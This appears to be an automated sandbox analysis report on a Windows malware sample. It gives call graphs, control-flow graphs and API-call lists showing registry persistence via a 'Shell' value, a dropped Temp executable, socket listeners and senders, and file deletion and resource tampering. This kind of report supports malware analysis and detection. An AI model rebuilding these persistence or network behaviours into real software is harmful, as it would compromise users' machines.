31234 413aac 8 API calls 31233->31234 31237 407b64 31234->31237 31235 407b81 31235->30751 31236 407b7c SetFileAttributesA 31236->31235 31237->31235 31237->31236 31238->31201 31240 421df7 31239->31240 31240->30773 31240->31240 31242 415785 31241->31242 31243 415797 31241->31243 31280 4156f5 Sleep GetWindowTextA 31241->31280 31242->31243 31244 41578a EnumWindows 31242->31244 31243->30794 31244->31243 31282 4156f5 2 API calls 31244->31282 31246 412cb4 31245->31246 31247 412cad 31245->31247 31284 412a45 GetTickCount 31246->31284 31283 412aca 7 API calls 31247->31283 31250 412cb2 31251 412cb9 31250->31251 31251->30794 31252->30789 31253->30804 31254->30801 31255->30804 31256->30806 31257->30810 31258->30810 31259->30810 31260->30810 31261->30813 31262->30815 31263->30817 31264->30819 31265->30821 31266->30823 31267->30825 31285 414e03 socket ioctlsocket htons connect 31268->31285 31271 402480 31271->30778 31271->30780 31272 402484 31293 41216e 31272->31293 31276 4024c7 31277 4024e4 closesocket 31276->31277 31299 402936 72 API calls 31276->31299 31277->31271 31279 4024db 31279->31277 31281 415725 31280->31281 31283->31250 31284->31251 31286 414e62 WSAGetLastError 31285->31286 31287 414ee6 closesocket 31285->31287 31286->31287 31288 414e6f select 31286->31288 31292 402477 31287->31292 31288->31287 31289 414eb0 __WSAFDIsSet 31288->31289 31290 414ec1 ioctlsocket 31289->31290 31291 414ed9 __WSAFDIsSet 31289->31291 31290->31287 31290->31292 31291->31287 31292->31271 31292->31272 31300 41351e 31293->31300 31295 41218e 31296 41a5dd lstrcpyA 31295->31296 31297 4024a4 send Sleep 31296->31297 31298 4032d4 13 API calls 31297->31298 31298->31276 31299->31279 31301 413410 lstrcpyA 31300->31301 31302 413544 31301->31302 31302->31295 31304 41118c 31303->31304 31305 411202 31304->31305 31306 4111af lstrcmpA 31304->31306 31308 4111da wsprintfA 31304->31308 31310 4149dc 31304->31310 31305->30833 31306->31304 31315 41100e MultiByteToWideChar 31308->31315 31326 4138bc inet_addr 31310->31326 31313 414a22 ioctlsocket connect select closesocket 31314 414a1e 31313->31314 31314->31304 31316 410bf4 4 API calls 31315->31316 31317 411057 MultiByteToWideChar 31316->31317 31319 411066 31317->31319 31318 411137 31321 410c3b 2 API calls 31318->31321 31319->31318 31320 4110a7 WideCharToMultiByte lstrcpyA lstrcatA 31319->31320 31329 410c84 88 API calls 31320->31329 31323 41113f 31321->31323 31323->31304 31324 411103 31324->31319 31330 410f49 95 API calls 31324->31330 31327 4138cb gethostbyname 31326->31327 31328 4138d9 htons socket 31326->31328 31327->31328 31328->31313 31328->31314 31329->31324 31330->31324 31331->30844 31341 405fd0 8 API calls 31331->31341 31332->30843 31333->30860 31342 41bd1b 53 API calls 31333->31342 31334->30862 31335->30861 31343 41470d 53 API calls 31335->31343 31336->30865 31337->30869 31338->30872 31339->30875 31344 41c0d2 52 API calls 31339->31344 31340->30878 31345 41f114 17 API calls 31340->31345 31348 41c4c8 72 API calls 31346->31348 31349 42108f 157 API calls 31347->31349 31350->30898 31351->30896 31352->30917 31354 406b34 31353->31354 31354->30914 31355->30920 31356->30933 31357->30933 31358->30933 31359->30933 31360->30930 31361->30939 31362->30939 31393 41382b CreateFileA GetFileSize CloseHandle 31363->31393 31365 4015d1 31366 410bf4 4 API calls 31365->31366 31367 4015d9 CreateFileA 31366->31367 31368 401601 ReadFile CloseHandle 31367->31368 31372 401621 31367->31372 31394 40156c 31368->31394 31369 410c3b 2 API calls 31371 401633 31369->31371 31371->30944 31372->31369 31374 402799 31373->31374 31375 4027ae 31374->31375 31399 4026f6 GetTickCount 31374->31399 31379 4027c5 31375->31379 31400 402748 GetTickCount 31375->31400 31378 4027bc 31378->31379 31380 4026f6 GetTickCount 31378->31380 31379->30959 31381 402705 31380->31381 31381->30959 31383 412c54 31382->31383 31383->30959 31384->30976 31385->30983 31386->30959 31387->30969 31388->30983 31389->30983 31390->30983 31391->30983 31392->30983 31393->31365 31396 40157a 31394->31396 31395 4015b6 31395->31372 31396->31395 31398 402657 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31396->31398 31398->31396 31399->31375 31400->31378 31402 4121f8 31401->31402 31403 412251 htons 31402->31403 31404 41216e lstrcpyA 31403->31404 31405 412288 socket 31404->31405 31406 4122ad bind 31405->31406 31407 41229f closesocket 31405->31407 31409 4122c7 listen 31406->31409 31412 4122bf closesocket 31406->31412 31408 4126a1 31407->31408 31408->30996 31410 4122dc ioctlsocket 31409->31410 31409->31412 31410->31412 31418 4122f5 31410->31418 31412->31408 31413 412328 select 31413->31412 31413->31418 31415 412366 __WSAFDIsSet 31415->31418 31416 41238a accept 31417 4123aa getpeername 31416->31417 31416->31418 31417->31418 31418->31412 31418->31413 31418->31415 31418->31416 31420 41243e shutdown closesocket 31418->31420 31431 4123e6 31418->31431 31432 4117b1 shutdown closesocket 31418->31432 31419 412476 recv 31419->31431 31420->31418 31421 4124cc shutdown closesocket 31421->31431 31423 413761 51 API calls 31423->31431 31424 4123eb GetTickCount 31424->31431 31425 4125fa lstrlenA 31425->31431 31428 412569 send 31428->31431 31430 4125cc CreateThread 31430->31418 31438 412123 79 API calls 31430->31438 31431->31418 31431->31419 31431->31421 31431->31423 31431->31425 31431->31428 31431->31430 31433 411775 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31431->31433 31434 4119a6 GetProcessHeap Sleep GetProcessHeap RtlAllocateHeap 31431->31434 31435 411df7 75 API calls 31431->31435 31436 4121cc shutdown 31431->31436 31432->31418 31433->31424 31434->31431 31435->31431 31437 411ae2 16 API calls 31435->31437 31436->31431 31442 4126b9 31439->31442 31440 412722 Sleep 31440->31442 31441 4126d4 GetTickCount 31441->31442 31442->31440 31442->31441 31443 4126f4 GetTickCount 31442->31443 31445 412706 GetTickCount 31442->31445 31446 4121cc shutdown 31442->31446 31443->31442 31445->31442 31446->31442 31448 4148d3 31447->31448 31455 414931 FindClose 31447->31455 31450 4149b6 FindNextFileA 31448->31450 31451 4148ef wsprintfA 31448->31451 31452 414969 lstrcpyA lstrcatA lstrcatA SetFileAttributesA DeleteFileA 31448->31452 31453 41493f lstrlenA 31448->31453 31448->31455 31450->31448 31450->31455 31451->31448 31452->31450 31453->31450 31454 414951 lstrcmpiA 31453->31454 31454->31450 31454->31452 31455->31007 31457 401ed8 lstrcpyA lstrlenA 31456->31457 31462 401ed1 31456->31462 31458 413732 3 API calls 31457->31458 31459 401f1a 31458->31459 31492 413a97 GetFileAttributesA 31459->31492 31461 401f26 31461->31462 31463 401f2d 31461->31463 31462->31016 31493 41a836 11 API calls 31463->31493 31465 401f4a 31465->31462 31494 4224e1 31465->31494 31467 401f60 31468 401e2a 17 API calls 31467->31468 31471 401f8d 31467->31471 31469 401f73 31468->31469 31470 401f78 CopyFileA 31469->31470 31469->31471 31470->31471 31471->31462 31499 409445 GetTickCount 31472->31499 31540 41382b CreateFileA GetFileSize CloseHandle 31477->31540 31479 4012f4 31480 410bf4 4 API calls 31479->31480 31488 4012ff 31479->31488 31481 401313 CreateFileA 31480->31481 31482 401374 ReadFile CloseHandle 31481->31482 31483 40133a 31481->31483 31485 410bf4 4 API calls 31482->31485 31484 410c3b 2 API calls 31483->31484 31486 401357 31484->31486 31485->31488 31487 410c3b 2 API calls 31486->31487 31487->31488 31488->31001 31489->31016 31490->31001 31491->31030 31492->31461 31493->31465 31495 422532 31494->31495 31497 4224ea 31494->31497 31495->31467 31496 42446f 49 API calls 31496->31497 31497->31496 31498 4224f3 31497->31498 31498->31467 31514 421d78 31499->31514 31501 40945e GetTickCount 31502 409486 31501->31502 31503 4140ca 4 API calls 31502->31503 31505 4094dc 31502->31505 31515 4092d5 Sleep 31502->31515 31503->31502 31506 409201 SetFileAttributesA 31505->31506 31539 413a97 GetFileAttributesA 31506->31539 31508 409219 31509 409262 31508->31509 31510 40921e LoadLibraryA 31508->31510 31509->31016 31510->31509 31511 40922f BeginUpdateResourceA 31510->31511 31512 409242 EnumResourceNamesA EndUpdateResourceW 31511->31512 31513 40925a FreeLibrary 31511->31513 31512->31513 31513->31509 31514->31501 31516 4092f8 wsprintfA 31515->31516 31517 40930f wsprintfA 31515->31517 31518 409321 FindFirstFileA 31516->31518 31517->31518 31526 4093a1 FindClose 31518->31526 31527 409341 31518->31527 31520 413761 51 API calls 31520->31527 31521 409363 wsprintfA 31523 4092d5 55 API calls 31521->31523 31522 40940a FindNextFileA 31522->31526 31522->31527 31523->31527 31524 4093bd lstrcpyA lstrcatA lstrcatA 31530 413a97 GetFileAttributesA 31524->31530 31526->31502 31527->31520 31527->31521 31527->31522 31527->31524 31527->31526 31529 409434 lstrcpyA 31527->31529 31531 40928f 31527->31531 31529->31526 31530->31527 31538 413a97 GetFileAttributesA 31531->31538 31533 40929f 31534 4092a4 31533->31534 31535 4092a6 LoadLibraryA 31533->31535 31534->31527 31536 4092d2 31535->31536 31537 4092b6 EnumResourceNamesA FreeLibrary 31535->31537 31536->31527 31537->31536 31538->31533 31539->31508 31540->31479

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040C812
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0040C865
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040C895
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040C8A8
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,Shell,00000000,00000001,?,00000000), ref: 0040C8BD
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040C8C6
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C8CE
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040C932
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040C949
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040C952
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C95A
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040C986
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040C9C3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C9CB
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040C9D4
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040C9F4
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040C9FC
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CA28
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CA60
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CA77
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CA80
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CA88
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CAB4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CAEC
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CB03
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CB0C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CB14
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CB40
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040CB7D
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CB8A
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CBA1
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CBAA
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CBB2
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040CBC0
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CBCD
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CC03
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CC36
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CC4D
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CC56
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CC5E
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CC8A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040CCC3
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CCD0
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CCE7
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CCF0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CCF8
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 0040CD24
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CD58
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CD6F
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CD78
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CD80
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0040C8FA
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                        • Part of subcall function 0040C7B4: lstrcatA.KERNEL32(76AF0F00,.exe,76AF0F00,0040CE0C,?,?,-00000004), ref: 0040C7D6
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040CD9B
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CDA8
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CDB6
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CDE2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CE16
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CE2D
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CE36
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CE3E
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,?,00000000), ref: 0040CE6A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A778), ref: 0040CEA3
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040CEB0
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 0040CEC7
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0040CED0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040CED8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$Sleep$CloseCreateValue$lstrcat$lstrcpy$CountTick
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$Shell
                                                                                                                                                                                                                                                      • API String ID: 2961240498-2765105148
                                                                                                                                                                                                                                                      • Opcode ID: 7404fc93447d8bf64e56304fcf3f363a38a5c7cd9712ee1ee70b377c33cd25fb
                                                                                                                                                                                                                                                      • Instruction ID: 90de6ba1451ff6c394c1e8d4d076b74571b15df8ac0f0f587aead68d2d5e9081
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7404fc93447d8bf64e56304fcf3f363a38a5c7cd9712ee1ee70b377c33cd25fb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2123DB2D4021CBFEB21EB90DC8AFEA777DEB44305F1004BAB605A5051EEB45F948E65

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1181 412fdd-413022 GetTickCount * 2 call 412c29 1184 413045-41304c 1181->1184 1185 413024-41302b 1181->1185 1187 41303a-41303f Sleep 1184->1187 1188 41304e-413063 GetTickCount call 40278d 1184->1188 1185->1184 1186 41302d-413032 call 4015bb 1185->1186 1191 413037-413038 1186->1191 1187->1184 1193 413145-41314e call 412c42 1188->1193 1194 413069-413078 call 412803 1188->1194 1191->1184 1201 413150-41315a GetTickCount 1193->1201 1202 4131c2-4131d0 call 41292e Sleep 1193->1202 1199 413085-41309c call 40245c 1194->1199 1200 41307a-41307f GetTickCount 1194->1200 1208 4130a1-4130a5 1199->1208 1200->1199 1204 413126-41312b 1200->1204 1201->1202 1206 41315c-413183 call 40245c 1201->1206 1212 4131d6-4131dd 1202->1212 1210 413137-41313f 1204->1210 1211 41312d-413132 GetTickCount 1204->1211 1225 4131b1-4131b5 1206->1225 1226 413185-413189 1206->1226 1213 4130a7-4130af 1208->1213 1214 4130f9-4130fd 1208->1214 1210->1193 1216 413253-413262 Sleep 1210->1216 1211->1210 1221 4131ef-4131f4 call 4015bb 1212->1221 1222 4131df-4131e6 call 412c29 1212->1222 1223 4130b1-4130b8 1213->1223 1224 4130ba 1213->1224 1217 413105 1214->1217 1218 4130ff-413103 1214->1218 1219 413264-41326b 1216->1219 1220 41329a 1216->1220 1227 413108-41310c 1217->1227 1218->1227 1219->1220 1228 41326d-413274 1219->1228 1234 4132a1-4132a8 1220->1234 1243 4131f9-413201 1221->1243 1222->1216 1248 4131e8-4131ed GetTickCount 1222->1248 1230 4130bd-4130c8 call 412a02 1223->1230 1224->1230 1235 4131b7-4131bb 1225->1235 1236 4131bd-4131c0 1225->1236 1231 413194 1226->1231 1232 41318b-413192 1226->1232 1238 41311a-41311d call 4128b1 1227->1238 1239 41310e-413117 call 41285e 1227->1239 1228->1220 1237 413276-41328c call 41411e 1228->1237 1261 4130d1-4130ed call 412b7e GetTickCount 1230->1261 1262 4130ca-4130cd 1230->1262 1242 413197-4131af call 412b7e GetTickCount 1231->1242 1232->1242 1244 41333c-413340 1234->1244 1245 4132ae-4132b3 GetTickCount 1234->1245 1235->1212 1236->1212 1237->1220 1269 41328e-413298 1237->1269 1260 413122-413125 1238->1260 1239->1238 1242->1212 1254 413203-41320a 1243->1254 1255 413249-413250 GetTickCount 1243->1255 1251 413342-41334d GetTickCount 1244->1251 1252 413389-41339c call 412a45 call 412c29 1244->1252 1245->1244 1256 4132b9-4132ce 1245->1256 1248->1216 1248->1221 1251->1252 1263 41334f-41335f 1251->1263 1289 4133c1-4133d8 call 412909 call 412846 1252->1289 1290 41339e-4133a6 1252->1290 1254->1255 1265 41320c-413246 lstrcpyA lstrlenA call 413732 call 4015bb 1254->1265 1255->1216 1266 4132d0-4132e3 call 40245c 1256->1266 1267 41331a 1256->1267 1260->1204 1282 413134 1261->1282 1283 4130ef-4130f7 call 4128ef 1261->1283 1262->1261 1271 413361 1263->1271 1272 413363-413371 Sleep 1263->1272 1265->1255 1286 413301-41330f 1266->1286 1287 4132e5-4132ff call 417016 call 40245c 1266->1287 1270 413321-413335 GetTickCount 1267->1270 1269->1234 1270->1244 1271->1272 1277 41337a-413387 InternetGetConnectedState 1272->1277 1277->1252 1285 413373-413378 Sleep 1277->1285 1282->1210 1283->1260 1285->1277 1286->1270 1291 413311-413318 1286->1291 1287->1267 1287->1286 1307 4133e3-4133f6 GetTickCount 1289->1307 1308 4133da-4133e2 call 41292e 1289->1308 1296 4133bd-4133bf 1290->1296 1291->1270 1296->1289 1299 4133a8-4133aa 1296->1299 1299->1289 1302 4133ac-4133b0 1299->1302 1304 4133b2-4133b9 1302->1304 1305 4133ba 1302->1305 1304->1305 1305->1296 1307->1184 1310 4133fc-41340b call 410946 call 410a09 GetTickCount 1307->1310 1308->1307 1310->1184
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00412FF4
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00412FF6
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041304E
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041307A
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004130E4
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041312D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413150
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004131AA
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000003), ref: 004131D0
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004131E8
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\), ref: 00413218
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000027), ref: 00413227
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413249
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00413255
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004132AE
                                                                                                                                                                                                                                                        • Part of subcall function 004015BB: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,76AF23A0), ref: 004015F4
                                                                                                                                                                                                                                                        • Part of subcall function 004015BB: ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040160B
                                                                                                                                                                                                                                                        • Part of subcall function 004015BB: CloseHandle.KERNEL32(00000000), ref: 00401612
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413321
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413342
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FD), ref: 0041336A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 00413378
                                                                                                                                                                                                                                                      • InternetGetConnectedState.WININET(?,00000000), ref: 0041337F
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004133E3
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413406
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0041320C
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe, xrefs: 0041302D, 004131EF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleep$File$CloseConnectedCreateHandleInternetReadStatelstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 2589685863-1343724464
                                                                                                                                                                                                                                                      • Opcode ID: dcb2bc8a0933efe07fedba4657b0612ce8228edf4dafa6e5b63ad683bb14c1b8
                                                                                                                                                                                                                                                      • Instruction ID: b377c5010cb92b842955c200201b203a8470812258737c0f6d08faac805126b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcb2bc8a0933efe07fedba4657b0612ce8228edf4dafa6e5b63ad683bb14c1b8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCC1D131804349DADB21EFA4D9457EEBBB0AB05316F24046FD814A3292DBBC9EC5C75E

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
